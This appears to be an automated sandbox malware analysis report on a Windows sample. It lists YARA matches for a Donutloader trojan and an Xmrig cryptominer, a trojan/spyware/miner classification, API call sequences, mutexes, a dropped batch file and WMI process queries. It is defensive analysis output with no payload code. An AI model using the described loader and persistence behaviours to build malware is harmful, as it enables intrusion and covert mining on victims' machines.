Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.mine.winEXE@157/47@1/2
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 94_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep, 95_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep, 97_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 56_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 56_2_004017A5
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e7WMhx18XN.exe.log Jump to behavior
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6140
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\00513a1e-7249-4c11-a0ce-fe6099077778
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\b.bat Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: e7WMhx18XN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: e7WMhx18XN.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\findstr.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
